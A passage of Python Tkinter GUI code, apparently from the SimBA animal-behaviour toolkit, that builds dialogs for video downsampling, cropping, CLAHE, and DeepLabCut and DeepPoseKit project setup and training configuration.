self.data_lists[i].append(self.table_col[i].entry_get(j))
# add path to videos for get coord
if currentPlatform == 'Windows':
self.data_lists[1] = [str(self.config_videofolders)+'\\'+s for s in self.data_lists[1]]
if currentPlatform == 'Linux'or (currentPlatform == 'Darwin'):
self.data_lists[1] = [str(self.config_videofolders)+'/'+s for s in self.data_lists[1]]
if self.pixel_list!= None:
self.button = Button_getcoord(self.xscrollbar, self.data_lists[1], self.data_lists[5],self.pixel_list)
self.button.grid(row=6, column=1)
else:
#update get coord with data
self.button = Button_getcoord(self.xscrollbar,self.data_lists[1],self.data_lists[5])
self.button.grid(row=6,column=1)
print("Table updated.")
def generate_video_info_csv(self):
#get latest data from table
self.data_lists = []
# get all data from tables
for i in range(len(self.table_col)):
self.data_lists.append([])
for j in range(len(self.filesFound)):
self.data_lists[i].append(self.table_col[i].entry_get(j))
#get the ppm from table
self.ppm=['pixels/mm']
for i in range(len(self.filesFound)-1):
self.ppm.append((self.button.getppm(i)))
self.data_lists.append(self.ppm)
#remove .mp4 from first column
self.data_lists[1] = [i.replace(i[-4:],'') for i in self.data_lists[1]]
self.data_lists[1][0] ='Video'
data=self.data_lists
df=pd.DataFrame(data=data)
df=df.transpose()
df=df.rename(columns=df.iloc[0])
df=df.drop(df.index[0])
df=df.reset_index()
df=df.drop(['index'],axis=1)
df=df.drop(['level_0'],axis=1)
logFolder = os.path.join(os.path.dirname(self.configFile), 'logs')
csv_filename = 'video_info.csv'
output = os.path.join(logFolder, csv_filename)
df.to_csv(str(output),index=False)
print(os.path.dirname(output),'generated.')
def setAll_ppm(self):
firstvalue = self.button.getppm(0)
self.button.set_allppm(firstvalue)
class video_downsample:
def __init__(self):
# Popup window
videosdownsample = Toplevel()
videosdownsample.minsize(200, 200)
videosdownsample.wm_title("Downsample Video Resolution")
# Video Path
self.videopath1selected = FileSelect(videosdownsample, "Video path",title='Select a video file')
label_choiceq = Label(videosdownsample, text='Choose only one of the following method to downsample videos (Custom/Default)')
#custom reso
label_downsamplevidcustom = LabelFrame(videosdownsample,text='Custom resolution',font='bold',padx=5,pady=5)
# width
self.label_width = Entry_Box(label_downsamplevidcustom,'Width','10')
# height
self.label_height = Entry_Box(label_downsamplevidcustom,'Height','10')
# confirm custom resolution
self.button_downsamplevideo1 = Button(label_downsamplevidcustom, text='Downsample to custom resolution',command=self.downsample_customreso)
#Default reso
# Checkbox
label_downsampleviddefault = LabelFrame(videosdownsample,text='Default resolution',font ='bold',padx=5,pady=5)
self.var1 = IntVar()
self.checkbox1 = Radiobutton(label_downsampleviddefault, text="1980 x 1080", variable=self.var1,value=1)
self.checkbox2 = Radiobutton(label_downsampleviddefault, text="1280 x 720", variable=self.var1,value=2)
self.checkbox3 = Radiobutton(label_downsampleviddefault, text="720 x 480", variable=self.var1, value=3)
self.checkbox4 = Radiobutton(label_downsampleviddefault, text="640 x 480", variable=self.var1, value=4)
self.checkbox5 = Radiobutton(label_downsampleviddefault, text="320 x 240", variable=self.var1, value=5)
# Downsample video
self.button_downsamplevideo2 = Button(label_downsampleviddefault, text='Downsample to default resolution',command=self.downsample_defaultreso)
# Organize the window
self.videopath1selected.grid(row=0,sticky=W)
label_choiceq.grid(row=1, sticky=W,pady=10)
label_downsamplevidcustom.grid(row=2,sticky=W,pady=10)
self.label_width.grid(row=0, column=0,sticky=W)
self.label_height.grid(row=1, column=0,sticky=W)
self.button_downsamplevideo1.grid(row=3)
label_downsampleviddefault.grid(row=3,sticky=W,pady=10)
self.checkbox1.grid(row=0,stick=W)
self.checkbox2.grid(row=1,sticky=W)
self.checkbox3.grid(row=2, sticky=W)
self.checkbox4.grid(row=3, sticky=W)
self.checkbox5.grid(row=4, sticky=W)
self.button_downsamplevideo2.grid(row=5)
def downsample_customreso(self):
self.width1 = self.label_width.entry_get
self.height1 = self.label_height.entry_get
ds = downsamplevideo(self.width1, self.height1, self.videopath1selected.file_path)
def downsample_defaultreso(self):
if self.var1.get()==1:
self.width2 = str(1980)
self.height2 = str(1080)
print('The width selected is ' + str(self.width2) + ', the height is ' + str(self.height2))
elif self.var1.get()==2:
self.width2 = str(1280)
self.height2 = str(720)
print('The width selected is ' + str(self.width2) + ', the height is ' + str(self.height2))
elif self.var1.get()==3:
self.width2 = str(720)
self.height2 = str(480)
print('The width selected is ' + str(self.width2) + ', the height is ' + str(self.height2))
elif self.var1.get()==4:
self.width2 = str(640)
self.height2 = str(480)
print('The width selected is ' + str(self.width2) + ', the height is ' + str(self.height2))
elif self.var1.get()==5:
self.width2 = str(320)
self.height2 = str(240)
print('The width selected is ' + str(self.width2) + ', the height is ' + str(self.height2))
ds = downsamplevideo(self.width2, self.height2, self.videopath1selected.file_path)
class Red_light_Convertion:
def __init__(self):
# Popup window
redlightconversion = Toplevel()
redlightconversion.minsize(200, 200)
redlightconversion.wm_title("CLAHE")
#CLAHE
label_clahe = LabelFrame(redlightconversion,text='Contrast Limited Adaptive Histogram Equalization',font='bold',padx=5,pady=5)
# Video Path
self.videopath1selected = FileSelect(label_clahe, "Video path ",title='Select a video file')
button_clahe = Button(label_clahe,text='Apply CLAHE',command=lambda:clahe(self.videopath1selected.file_path))
#organize the window
label_clahe.grid(row=0,sticky=W)
self.videopath1selected.grid(row=0,sticky=W)
button_clahe.grid(row=1,pady=5)
class crop_video:
def __init__(self):
# Popup window
cropvideo = Toplevel()
cropvideo.minsize(300, 300)
cropvideo.wm_title("Crop Video")
# Normal crop
label_cropvideo = LabelFrame(cropvideo,text='Crop Video',font='bold',padx=5,pady=5)
self.videopath1selected = FileSelect(label_cropvideo,"Video path",title='Select a video file')
# CropVideo
button_cropvid = Button(label_cropvideo, text='Crop Video', command=lambda:cropvid(self.videopath1selected.file_path))
# fixed crop
label_videoselection = LabelFrame(cropvideo, text='Fixed coordinates crop for multiple videos', font='bold', padx=5, pady=5)
self.folder1Select = FolderSelect(label_videoselection, 'Video directory:', title='Select Folder with videos')
# output video
self.outputfolder = FolderSelect(label_videoselection, 'Output directory:',
title='Select a folder for your output videos')
# create list of all videos in the videos folder
button_cL = Button(label_videoselection, text='Confirm', command=lambda: youOnlyCropOnce(self.folder1Select.folder_path,self.outputfolder.folder_path))
#organize
label_cropvideo.grid(row=0,sticky=W)
self.videopath1selected.grid(row=0,sticky=W)
button_cropvid.grid(row=1,sticky=W,pady=10)
#fixedcrop
label_videoselection.grid(row=1,sticky=W,pady=10,padx=5)
self.folder1Select.grid(row=0,sticky=W,pady=5)
self.outputfolder.grid(row=1,sticky=W,pady=5)
button_cL.grid(row=2,sticky=W,pady=5)
class create_project_DLC:
def __init__(self):
# Popup window
createproject = Toplevel()
createproject.minsize(400, 250)
createproject.wm_title("Create Project")
self.label_dlc_createproject = LabelFrame(createproject,text='Create Project',font =("Helvetica",12,'bold'))
#project name
self.label_projectname = Entry_Box(self.label_dlc_createproject,'Project name','16')
#Experimenter name
self.label_experimentername = Entry_Box(self.label_dlc_createproject,'Experimenter name','16')
#button 1
button_videofol = Button(self.label_dlc_createproject,text='Import Single Video',command=self.changetovideo2,fg='blue')
#button 2
button_videofo2 = Button(self.label_dlc_createproject,text='Import Multiple Videos',command=self.changetovideo,fg='green4')
# Video Path
self.videopath1selected = FolderSelect(self.label_dlc_createproject, 'Video Folder ',title='Select folder with videos',color='green4')
self.videopath1selected.grid(row=4, sticky=W)
#video folder
self.folderpath1selected = FolderSelect(self.label_dlc_createproject,'Project directory ',title='Select main directory')
#bodypart configuration file
self.bodypartconfigfile = FileSelect(self.label_dlc_createproject, 'Bp config file ', title='Select a csv file')
# # statusbar
# self.projectcreated = IntVar()
# Label(createproject, textvariable=self.projectcreated, bd=1, relief=SUNKEN).grid(row=7,sticky=W)
# self.projectcreated.set('Status: Waiting for input...')
#checkbox_apply golden aggresion config yaml settings
self.var_changeyaml = IntVar()
checkbox2 = Checkbutton(self.label_dlc_createproject,text='Apply Golden Lab 16-body part config',variable=self.var_changeyaml)
#checkbox for copy videos true or false
self.var_copyvid = IntVar()
checkbox1 = Checkbutton(self.label_dlc_createproject,text='Copy videos (If unchecked, shortcuts are created)',variable=self.var_copyvid)
#run create project
button_createproject = Button(self.label_dlc_createproject,text='Create Project',fg='red',command=self.createprojectcommand)
#organize
self.label_dlc_createproject.grid(row=0)
self.label_projectname.grid(row=0,column=0,sticky=W)
self.label_experimentername.grid(row=1,column=0,sticky=W)
button_videofol.grid(row=2,sticky=W,pady=5)
button_videofo2.grid(row=3,sticky=W,pady=5)
self.folderpath1selected.grid(row=5,sticky=W)
self.bodypartconfigfile.grid(row=6, sticky=W)
checkbox2.grid(row=7,column=0,sticky=W)
checkbox1.grid(row=8,sticky=W)
button_createproject.grid(row=9,column=3,pady=10,padx=5)
def changetovideo(self):
self.videopath1selected.grid_remove()
self.videopath1selected = FolderSelect(self.label_dlc_createproject, 'Video Folder ',title='Select folder with videos',color='green4')
self.videopath1selected.grid(row=4, sticky=W)
def changetovideo2(self):
self.videopath1selected.grid_remove()
self.videopath1selected = FileSelect(self.label_dlc_createproject, 'Video path ',color='blue',title='Select a video file')
self.videopath1selected.grid(row=4, sticky=W)
def createprojectcommand(self):
projectname = self.label_projectname.entry_get
experimentalname = self.label_experimentername.entry_get
if self.var_copyvid.get()==1:
copyvid = True
elif self.var_copyvid.get()==0:
copyvid = False
if 'FileSelect' in str(type(self.videopath1selected)):
videolist = [self.videopath1selected.file_path]
else:
try:
videolist = []
for i in os.listdir(self.videopath1selected.folder_path):
if ('.avi' or '.mp4') in i:
i = os.path.join(self.videopath1selected.folder_path, i)
videolist.append(i)
except:
print('Please select a video folder to import videos')
if 'FileSelect' in str(type(self.bodypartconfigfile)):
bodyPartConfigFile = (self.bodypartconfigfile.file_path)
if self.var_changeyaml.get()==1:
if (projectname !='') and (experimentalname !='') and ('No'and'selected' not in videolist) and (self.folderpath1selected.folder_path!='No folder selected'):
config_path = deeplabcut.create_new_project(str(projectname), str(experimentalname), videolist,working_directory=str(self.folderpath1selected.folder_path), copy_videos=copyvid)
changedlc_config(config_path, 0)
else:
print('Please make sure all the information are filled in')
else:
if (projectname != '') and (experimentalname != '') and ('No' and 'selected' not in videolist) and (self.folderpath1selected.folder_path != 'No folder selected'):
config_path = deeplabcut.create_new_project(str(projectname), str(experimentalname), videolist,working_directory=str(self.folderpath1selected.folder_path), copy_videos=copyvid)
else:
print('Please make sure all the information are filled in')
if bodyPartConfigFile != 'No file selected':
changedlc_config(config_path, bodyPartConfigFile)
class createDPK_project:
def __init__(self):
cdpkmenu = Toplevel()
cdpkmenu.minsize(300,200)
cdpkmenu.wm_title('Create DeepPoseKit project')
cdpk_label = LabelFrame(cdpkmenu,pady=5,padx=5)
self.inifile = FileSelect(cdpk_label,'SimBA project.ini file',lblwidth='18')
self.projectName = Entry_Box(cdpk_label,'Project Name','18')
#button
generate_Button = Button(cdpk_label,text='Generate project',command=self.generateProject)
#organize
cdpk_label.grid(row=0,sticky=W)
self.inifile.grid(row=0,sticky=W)
self.projectName.grid(row=1,sticky=W)
generate_Button.grid(row=2,sticky=W)
def generateProject(self):
projectdir = os.path.dirname(self.inifile.file_path)
write_dpkfile(projectdir,self.projectName.entry_get)
print('DeepPoseKit project generated.')
class deepPoseKitMenu:
def __init__(self,inifile):
self.configini = inifile
# Popup window
dpkMenu = Toplevel()
dpkMenu.minsize(400, 400)
dpkMenu.wm_title("DeepPoseKit")
#parent tab
tab_parent = ttk.Notebook(dpkMenu)
#children tab
tab0 = ttk.Frame(tab_parent)
tab1 = ttk.Frame(tab_parent)
tab2 = ttk.Frame(tab_parent)
tab3 = ttk.Frame(tab_parent)
tab4 = ttk.Frame(tab_parent)
tab5 = ttk.Frame(tab_parent)
tab_parent.add(tab0, text=f'{"[ Import Videos ]": ^20s}')
tab_parent.add(tab1, text=f'{"[ Create annotation set ]": ^20s}')
tab_parent.add(tab2, text=f'{"[ Annotater ]": ^20s}')
tab_parent.add(tab3, text=f'{"[ Train model ]": ^20s}')
tab_parent.add(tab4, text=f'{"[ Predict new video ]": ^20s}')
tab_parent.add(tab5, text=f'{"[ Visualize video ]": ^20s}')
tab_parent.grid(row=0)
#import videos
label_importvideo = LabelFrame(tab0, text='Import videos into DPK project', font=("Helvetica",12,'bold'), padx=15,pady=5,fg='black')
# multi video
label_multivideoimport = LabelFrame(label_importvideo, text='Import multiple videos', pady=5, padx=5)
self.multivideofolderpath = FolderSelect(label_multivideoimport, 'Folder path',title='Select Folder with videos')
self.video_type = Entry_Box(label_multivideoimport, 'File format (i.e., mp4/avi):', '20')
button_multivideoimport = Button(label_multivideoimport, text='Import multiple videos',command=self.importvideo_multi, fg='black')
# singlevideo
label_singlevideoimport = LabelFrame(label_importvideo, text='Import single video', pady=5, padx=5)
self.singlevideopath = FileSelect(label_singlevideoimport, "Video Path",title='Select a video file')
button_importsinglevideo = Button(label_singlevideoimport, text='Import a video',command= self.importvideo_single,fg='black')
#Create annotation
createann_label = LabelFrame(tab1,pady=5,padx=5)
annOutputName = Entry_Box(createann_label,'Annotation Output Name','21')
readBatchSize = Entry_Box(createann_label,'Read Batch Size','21')
kmeanbSize = Entry_Box(createann_label, 'k means batch size', '21')
kmeanNcluster = Entry_Box(createann_label, 'k means n clusters', '21')
kmeanmaxIter = Entry_Box(createann_label, 'k means max iterations', '21')
kmeanNinit = Entry_Box(createann_label, 'k means n init', '21')
crateaAnnButton = Button(createann_label,text='Create Annotation',command=lambda:self.dpkStep1(annOutputName.entry_get,readBatchSize.entry_get,kmeanbSize.entry_get,kmeanNcluster.entry_get,kmeanmaxIter.entry_get,kmeanNinit.entry_get))
## set
readBatchSize.entry_set('100')
kmeanbSize.entry_set('100')
kmeanNcluster.entry_set('10')
kmeanmaxIter.entry_set('1000')
kmeanNinit.entry_set('10')
#Annotator
annfile_label = LabelFrame(tab2,pady=5,padx=5)
annfile = FileSelect(annfile_label,'Annotation file',lblwidth='18')
#button
runann_button = Button(annfile_label,text='Run',command=lambda:dpkAnnotator(self.configini,annfile.file_path))
def activate(box, *args):
for entry in args:
if box.get() == 0:
entry.set_state(DISABLED)
elif box.get() == 1:
entry.set_state(NORMAL)
#train model deeposekit
trainmodel_label = LabelFrame(tab3,pady=5,padx=5)
annpath = FileSelect(trainmodel_label,'Annotations path',lblwidth='18')
savemodelPath = Entry_Box(trainmodel_label,'Output model name','18')
epochs = Entry_Box(trainmodel_label,'epochs','18')
dsFactor = Entry_Box(trainmodel_label,'Downsample factor','18')
validationSplit = Entry_Box(trainmodel_label,'Validation split','18')
sigma = Entry_Box(trainmodel_label,'Sigma','18')
graphscale = Entry_Box(trainmodel_label,'Graph scale','18')
TorFoptions = {'True','False'}
augmenter = DropDownMenu(trainmodel_label,'Augmenter',TorFoptions,'18')
validationbatchSize = Entry_Box(trainmodel_label,'Validation batch size','18')
modelgrowthrate = Entry_Box(trainmodel_label,'Model growth rate','18')
modelbatchsize = Entry_Box(trainmodel_label,'Model Batch Size','18')
#logger
loggervar = IntVar(value=1)
loggervalidBatchSize = Entry_Box(trainmodel_label, 'Logger validation batch size', '18')
loggercheckbox = Checkbutton(trainmodel_label, text='Logger', variable=loggervar,
command=lambda: activate(loggervar, loggervalidBatchSize))
# lr factor
reducevar = IntVar(value=1)
reducelrfactor = Entry_Box(trainmodel_label, 'Reduce LR factor', '18')
reducelrcheckbox = Checkbutton(trainmodel_label, text='Reduce_Lr', variable=reducevar,
command=lambda: activate(reducevar, reducelrfactor))
checkpointscheckbox = DropDownMenu(trainmodel_label,'Model Checkpoints',TorFoptions,'18')
earlyStopcheckbox = DropDownMenu(trainmodel_label,'Early stop',TorFoptions,'18')
## choose model
modelsoption = {'DeepLabCut','LEAP','StackedDenseNet','StackedHourglass'}
self.nnArchitecture = DropDownMenu(trainmodel_label,'NN_architecture',modelsoption,'18')
modelsettingsbutton = Button(trainmodel_label,text='Model Settings',command=self.modelsettingschoice)
#button
trainmodelbutton = Button(trainmodel_label,text='Train model',command = lambda:self.traindpk(annpath.file_path,savemodelPath.entry_get,epochs.entry_get,dsFactor.entry_get,validationSplit.entry_get,sigma.entry_get,
graphscale.entry_get,augmenter.getChoices(),validationbatchSize.entry_get,modelgrowthrate.entry_get,modelbatchsize.entry_get,
loggervar.get(),loggervalidBatchSize.entry_get,reducevar.get(),reducelrfactor.entry_get,checkpointscheckbox.getChoices(),earlyStopcheckbox.getChoices(),self.nnArchitecture.getChoices()))
#set
epochs.entry_set('200')
dsFactor.entry_set('2')
validationSplit.entry_set('0.05')
sigma.entry_set('5')
graphscale.entry_set('1')
augmenter.setChoices('True')
validationbatchSize.entry_set('2')
modelgrowthrate.entry_set('32')
modelbatchsize.entry_set('2')
loggervalidBatchSize.entry_set('2')
reducelrfactor.entry_set('0.2')
checkpointscheckbox.setChoices('True')
earlyStopcheckbox.setChoices('True')
self.nnArchitecture.setChoices('StackedDenseNet')
#predict new video
predictvid_label = LabelFrame(tab4,pady=5,padx=5)
modelPath = FileSelect(predictvid_label,'Model path', lblwidth='12')
vidfolderpredict = FolderSelect(predictvid_label,'Video Folder',lblwidth='12')
#button
predictbutton = Button(predictvid_label,text='Predict',command=lambda:self.runprediction(modelPath.file_path,vidfolderpredict.folder_path))
#Visualize video
visualize_label = LabelFrame(tab5,pady=5,padx=5)
#button
visualizeButton = Button(visualize_label,text='Run',command=lambda:visualizeDPK(self.configini))
#organize
#import videos
label_importvideo.grid(row=0)
# multi video
label_multivideoimport.grid(row=0,sticky=W)
self.multivideofolderpath.grid(row=0,sticky=W)
self.video_type.grid(row=1,sticky=W)
button_multivideoimport.grid(row=2,sticky=W)
# singlevideo
label_singlevideoimport.grid(row=1,sticky=W)
self.singlevideopath.grid(row=0,sticky=W)
button_importsinglevideo.grid(row=1,sticky=W)
##create annotation
createann_label.grid(row=0,sticky=W,pady=1)
annOutputName.grid(row=1, sticky=W, pady=1)
readBatchSize.grid(row=2, sticky=W, pady=1)
kmeanbSize.grid(row=3, sticky=W, pady=1)
kmeanNcluster.grid(row=4, sticky=W, pady=1)
kmeanmaxIter.grid(row=5, sticky=W, pady=1)
kmeanNinit.grid(row=6, sticky=W, pady=1)
crateaAnnButton.grid(row=7,pady=5)
##annotator
annfile_label.grid(row=1,sticky=W,pady=1)
annfile.grid(row=0,sticky=W,pady=1)
runann_button.grid(row=2,pady=5)
##trainmodel
trainmodel_label.grid(row=2,sticky=W,pady=1)
annpath.grid(row=0,sticky=W,pady=1)
savemodelPath.grid(row=1,sticky=W,pady=1)
epochs.grid(row=2, sticky=W, pady=1)
dsFactor.grid(row=3, sticky=W, pady=1)
validationSplit.grid(row=4, sticky=W, pady=1)
sigma.grid(row=5, sticky=W, pady=1)
graphscale.grid(row=6, sticky=W, pady=1)
augmenter.grid(row=7, sticky=W, pady=1)
validationbatchSize.grid(row=8, sticky=W, pady=1)
modelgrowthrate.grid(row=9, sticky=W, pady=1)
modelbatchsize.grid(row=10, sticky=W, pady=1)
loggercheckbox.grid(row=11, sticky=W, pady=1)
loggervalidBatchSize.grid(row=12, sticky=W, pady=1)
reducelrcheckbox.grid(row=13, sticky=W, pady=1)
reducelrfactor.grid(row=14, sticky=W, pady=1)
checkpointscheckbox.grid(row=15, sticky=W, pady=1)
earlyStopcheckbox.grid(row=16, sticky=W, pady=1)
self.nnArchitecture.grid(row=17, sticky=W, pady=1)
modelsettingsbutton.grid(row=18, sticky=W, pady=5)
trainmodelbutton.grid(row=19, pady=5)
##predictnewvideo
predictvid_label.grid(row=3,sticky=W,pady=1)
modelPath.grid(row=0,sticky=W,pady=1)
vidfolderpredict.grid(row=1,sticky=W,pady=1)
predictbutton.grid(row=4,pady=5)
##visualize
visualize_label.grid(row=4,sticky=W,pady=1)
visualizeButton.grid(row=2,pady=5)
def importvideo_single(self):
if (self.configini != 'No file selected') and (self.singlevideopath.file_path != 'No file selected'):
copy_singlevideo_DPKini(self.configini, self.singlevideopath.file_path)
else:
print('Fail to import video, please select a video to import')
def importvideo_multi(self):
if (self.configini != 'No file selected') and (
self.multivideofolderpath.folder_path != 'No folder selected') and (self.video_type.entry_get != ''):
copy_multivideo_DPKini(self.configini, self.multivideofolderpath.folder_path, self.video_type.entry_get)
else:
print('Fail to import videos, please select folder with videos and enter the file format')
def runprediction(self,modelpath,videofolder):
configini = self.configini
config = ConfigParser()
config.read(configini)
config.set('predict settings', 'modelPath',str(modelpath))
# write
with open(configini, 'w') as configfile:
config.write(configfile)
predictnewvideoDPK(configini,videofolder)
def traindpk(self,annotationfilepath,outputmodelName,epochs,dsfactor,validationsplit,sigma,graphscale,augmenter,validationbatchsize,modelgrowthrate,modelbatchsize,logger,loggerentry,reduce,reducefactor,checkpoint,earlystop,architure):
#get the config
configini = self.configini
config = ConfigParser()
config.read(configini)
## main training settings
config.set('train model settings', 'epochs', str(epochs))
config.set('train model settings', 'downsampleFactor', str(dsfactor))
config.set('train model settings', 'validation_split', str(validationsplit))
config.set('train model settings', 'sigma', str(sigma))
config.set('train model settings', 'graph_scale', str(graphscale))
config.set('train model settings', 'augmenterCheck', str(augmenter))
config.set('train model settings', 'validation_batch_size', str(validationbatchsize))
config.set('train model settings', 'modelGrowthRate', str(modelgrowthrate))
config.set('train model settings', 'model_batch_size', str(modelbatchsize))
config.set('train model settings', 'loggerCheck', str(logger))
config.set('train model settings', 'logger_validation_batch_size', str(loggerentry))
config.set('train model settings', 'reducelrCheck', str(reduce))
config.set('train model settings', 'reduce_lr_factor', str(reducefactor))
config.set('train model settings', 'earlyStopCheck', str(earlystop))
config.set('train model settings', 'modelcheckPointCheck', str(checkpoint))
config.set('train model settings', 'NN_architecture', str(architure))
#write
with open(configini, 'w') as configfile:
config.write(configfile)
trainDPKmodel(configini,outputmodelName,annotationfilepath)
def dpkStep1(self,annOutputName,readBatchSize,kmeansize,kmeancluster,kmeanmaxiter,kmeanNinit):
print('Creating annotation set.')
configini = self.configini
config = ConfigParser()
config.read(configini)
config.set('create annotation settings', 'annotation_output_name', str(annOutputName))
config.set('create annotation settings', 'read_batch_size', str(readBatchSize))
config.set('create annotation settings', 'k_means_batch_size', str(kmeansize))
config.set('create annotation settings', 'k_means_n_custers', str(kmeancluster))
config.set('create annotation settings', 'k_means_max_iterations', str(kmeanmaxiter))
config.set('create annotation settings', 'k_means_n_init', str(kmeanNinit))
with open(configini, 'w') as configfile:
config.write(configfile)
createAnnotationSet(configini)
print('Annotation set created')
def modelsettingschoice(self):
print(self.nnArchitecture.getChoices())
if (self.nnArchitecture.getChoices() == 'StackedDenseNet') or (self.nnArchitecture.getChoices() == 'StackedHourglass'):
self.stackMenu()
elif (self.nnArchitecture.getChoices() == 'DeepLabCut'):
self.deeplabcutMenu()
elif(self.nnArchitecture.getChoices() =='LEAP'):
self.leapmenu()
def stackMenu(self):
stacktoplevel = Toplevel()
stacktoplevel.minsize(300, 200)
stacktoplevel.wm_title("StackedDenseNet / StackHourglass")
stacklabel = LabelFrame(stacktoplevel,pady=5,padx=5)
n_stacks = Entry_Box(stacklabel,'N_stacks','15')
n_transitions = Entry_Box(stacklabel,'N_transitions','15')
growthrate = Entry_Box(stacklabel,'Growth rate','15')
bottleneckFactor = Entry_Box(stacklabel,'Bottleneck factor','15')
compressionfactor = Entry_Box(stacklabel,'Compression factor','15')
TorFalseOptions = {'True','False'}
pretrained = DropDownMenu(stacklabel,'Pretrained',TorFalseOptions,'15')
subpixel = DropDownMenu(stacklabel, 'Subpixel', TorFalseOptions, '15')
#set initial dropdown
n_stacks.entry_set('1')
n_transitions.entry_set('1')
growthrate.entry_set('48')
bottleneckFactor.entry_set('1')
compressionfactor.entry_set('0.5')
pretrained.setChoices('False')
subpixel.setChoices('True')
# button
stackmenubutton = Button(stacklabel,text='Save settings',command= lambda:self.savestacksettings(n_stacks.entry_get, n_transitions.entry_get,growthrate.entry_get,bottleneckFactor.entry_get,compressionfactor.entry_get,pretrained.getChoices(),subpixel.getChoices()))
#organize
stacklabel.grid(row=0,sticky=W)
n_stacks.grid(row=0,sticky=W,pady=1)
n_transitions.grid(row=1,sticky=W,pady=1)
growthrate.grid(row=2,sticky=W,pady=1)
bottleneckFactor.grid(row=3,sticky=W,pady=1)
compressionfactor.grid(row=4,sticky=W,pady=1)
pretrained.grid(row=5,sticky=W,pady=1)
subpixel.grid(row=6,sticky=W,pady=1)
stackmenubutton.grid(row=7,pady=5)
def savestacksettings(self,nstack,ntransitions,growthrate,bneckfactor,compressfactor,pretrain,subpixel):
configini = self.configini
config = ConfigParser()
config.read(configini)
config.set('StackedDenseNet/StackedHourglass settings', 'n_stacks', str(nstack))
config.set('StackedDenseNet/StackedHourglass settings', 'n_transitions', str(ntransitions))
config.set('StackedDenseNet/StackedHourglass settings', 'growth_rate', str(growthrate))
config.set('StackedDenseNet/StackedHourglass settings', 'bottleneckfactor', str(bneckfactor))
config.set('StackedDenseNet/StackedHourglass settings', 'compression_factor', str(compressfactor))
config.set('StackedDenseNet/StackedHourglass settings', 'pretrained', str(pretrain))
config.set('StackedDenseNet/StackedHourglass settings', 'subpixel', str(subpixel))
with open(configini, 'w') as configfile:
config.write(configfile)
print('Settings saved.')
def deeplabcutMenu(self):
dlctoplevel = Toplevel()
dlctoplevel.minsize(300, 200)
dlctoplevel.wm_title("DeepLabCut")
dlclabel = LabelFrame(dlctoplevel,pady=5,padx=5)
weightsoptions = {'imagenet','none'}
backboneoptions = {'resnet50','resnet101','resnet152','mobilenetv2','densenet121','densenet169','densenet201','xception'}
torFalseoptions = {'True','False'}
##dropdowns
weight = DropDownMenu(dlclabel,'Weights',weightsoptions,'10')
backbone = DropDownMenu(dlclabel,'Backbone',backboneoptions,'10')
alpha = Entry_Box(dlclabel,'Alpha','10')
subpixel = DropDownMenu(dlclabel,'Subpixel',torFalseoptions,'10')
##sets
#alpha.set(1)
weight.setChoices('imagenet')
backbone.setChoices('resnet50')
subpixel.setChoices('True')
#button
dlcsettingsbutton = Button(dlclabel,text='Save Settings',command=lambda:self.savedlcsettings(weight.getChoices(),backbone.getChoices(),alpha.entry_get,subpixel.getChoices()))
#organize
dlclabel.grid(row=0,sticky=W)
weight.grid(row=0,sticky=W,pady=1)
backbone.grid(row=1, sticky=W, pady=1)
alpha.grid(row=2, sticky=W, pady=1)
subpixel.grid(row=3, sticky=W, pady=1)
dlcsettingsbutton.grid(row=4,pady=5)
def savedlcsettings(self,weight,backbone,alpha,subpixel):
configini = self.configini
config = ConfigParser()
config.read(configini)
config.set('DeepLabCut settings', 'weights', str(weight))
config.set('DeepLabCut settings', 'backbone', str(backbone))
config.set('DeepLabCut settings', 'alpha', str(alpha))
config.set('DeepLabCut settings', 'subpixel', str(subpixel))
with open(configini, 'w') as configfile:
config.write(configfile)
print('Settings saved.')
def leapmenu(self):
leaptoplevel = Toplevel()
leaptoplevel.minsize(300, 200)
leaptoplevel.wm_title("LEAP")
leaplabel = LabelFrame(leaptoplevel,pady=5,padx=5)
filters = Entry_Box(leaplabel,'Filters','10')
torFalseoption = {'True','False'}
upsamplinglayers = DropDownMenu(leaplabel,'Upsampling layers',torFalseoption,'15')
batchnorm = DropDownMenu(leaplabel,'Batchnorm',torFalseoption,'15')
poolingoption = {'max','average'}
pooling = DropDownMenu(leaplabel,'Pooling',poolingoption,'15')
interpolationoption = {'nearest','bilinear','bicubic'}
interpolation = DropDownMenu(leaplabel,'Interpolation',interpolationoption,'15')
initializeroption = {'glorot_uniform','lecun_normal'}
initializer = DropDownMenu(leaplabel,'Initializer',initializeroption,'15')
subpixel = DropDownMenu(leaplabel,'Subpixel',torFalseoption,'15')
#sets
filters.set('64')
upsamplinglayers.setChoices('False')
batchnorm.setChoices('False')
pooling.setChoices('max')
interpolation.setChoices('nearest')
initializer.setChoices('glorot_uniform')
subpixel.setChoices('True')
#button
leapbutton = Button(leaplabel,text='Save settings',command=lambda:self.saveleapsettings(filters.entry_get,upsamplinglayers.getChoices(),batchnorm.getChoices(),pooling.getChoices(),interpolation.getChoices(),initializer.getChoices(),subpixel.getChoices()))
#organize
leaplabel.grid(row=0,sticky=W)
filters.grid(row=0,sticky=W)
upsamplinglayers.grid(row=1,sticky=W)
batchnorm.grid(row=2,sticky=W)
pooling.grid(row=3,sticky=W)
interpolation.grid(row=4,sticky=W)
initializer.grid(row=5,sticky=W)
subpixel.grid(row=6,sticky=W)
leapbutton.grid(row=7,pady=5)
def saveleapsettings(self,filters,upsampling,batchnorm,pooling,interpolation,initializer,subpixel):
configini = self.configini
config = ConfigParser()
config.read(configini)
config.set('LEAP settings', 'filters', str(filters))
config.set('LEAP settings', 'upsampling_layers', str(upsampling))
config.set('LEAP settings', 'batchnorm', str(batchnorm))
config.set('LEAP settings', 'pooling', str(pooling))
config.set('LEAP settings', 'interpolation', str(interpolation))
config.set('LEAP settings', 'subpixel', str(subpixel))
config.set('LEAP settings', 'initializer', str(initializer))
with open(configini, 'w') as configfile:
config.write(configfile)
print('Settings saved.')
class Load_DLC_Model:
def __init__(self):
# Popup window
loadmodel = Toplevel()
loadmodel.minsize(200, 200)
loadmodel.wm_title("Load DLC Model")
tab_parent = ttk.Notebook(loadmodel)
tab1 = ttk.Frame(tab_parent)
tab2 = ttk.Frame(tab_parent)
tab3 = ttk.Frame(tab_parent)
tab4 = ttk.Frame(tab_parent)
tab7 = ttk.Frame(tab_parent)
tab8 = ttk.Frame(tab_parent)
tab9 = ttk.Frame(tab_parent)
tab10 = ttk.Frame(tab_parent)
tab11 = ttk.Frame(tab_parent)
tab12 = ttk.Frame(tab_parent)
tab13 = ttk.Frame(tab_parent)
tab14 = ttk.Frame(tab_parent)
tab15 = ttk.Frame(tab_parent)
tab_parent.add(tab1, text=f'{"[ Load model ]": ^20s}')
tab_parent.add(tab2,text=f'{"[ Generate temp yaml ]": ^20s}')
